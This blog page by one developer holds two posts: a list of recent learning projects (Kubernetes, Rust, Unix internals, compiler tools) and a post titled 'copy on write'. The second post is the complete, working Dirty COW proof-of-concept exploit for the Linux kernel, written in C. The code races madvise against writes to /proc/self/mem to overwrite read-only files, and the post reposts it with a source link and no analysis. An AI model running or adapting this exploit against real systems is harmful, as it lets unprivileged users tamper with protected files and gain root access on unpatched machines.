John Musgrave

new projects

Some highlights of recent projects in the works:

Coming up to speed on using Kubernetes and Docker Swarm for project deployment. Building something like a PaaS is becoming more trivial now due to the reliability and simplicity of using these services for deployment and things like container orchestration. I see no reason to use anything else. After developing a PaaS platform for deployment in the past year, there’s no reason to re-invent features that are present in Kubernetes. Especially since Google has donated the project to the Cloud Native Computing Foundation.

I was learning Rust for a bit. Has some nice features, and seems to be gaining adoption comparable to Golang. I thought the concurrency model was a novel idea, and the compile time checks for concurrency were an interesting takeaway. Heard an interesting talk from wycatz comparing Rust to Node, in their accessibility to beginners and the impact that it could have on larger projects.

Reading about lower level stuff in Computer Organization and Architecture.

I finished reading Linux Kernel Development and am reading The Design of the Unix Operating System, after reading Ritchie’s paper on Unix, “The Unix Timesharing System.” Pretty good description of how they implemented the filesystem in this paper. Additionally there are some great design principles in the Unix book. And it’s a nice introduction to the Linux system API. He goes over a basic implementation of a file copy program within the first few pages that takes very few lines of code to implement, and is extremely performant using kernel system calls. I also took a crack at writing a shell to execute commands after forking from the parent process.

Was working on a project for the generation of synthetic digital circuits using existing benchmarks and CCirc and CGen from the University of Toronto. This required writing a lexer for the Berkeley Logic Interchange Format, which defines rules for logic gates, and then parsing the generated DOT formatted files, which can generate graphs using GraphViz.

Read an interesting article not too long ago in Communications of the ACM on learning problems, and their application to learning models of Deterministic Finite Automata.

Interested in using the Synaptic Node.js library for Machine Learning, if I can find a dataset that has good applications to a learning problem. Also interested in the implications of machine learning processing using parallel computation, since they are both a good fit for (sparse, I’m assuming) matrices. Still trying to come up to speed on my Category Theory and Abstract Algebra.

Picking up a functional style of programming, and started learning Haskell.

Spent some time learning more compiler tools. Parser and compiler generators. Pretty much all that I could find. Yacc, Lex, Bison, Flex, ANTLR. Also started working with the LLVM toolchain and wrote a sample LLVM Pass.

Trying to get more involved in the web standards community.

Taking a look at parallel simulation models in greater depth.

Read Kevin Mitnick’s new book on privacy and security.

Oh, and the ACM Hackathon this Spring was awesome.

-John

@musgravejw

copy on write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}


int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

source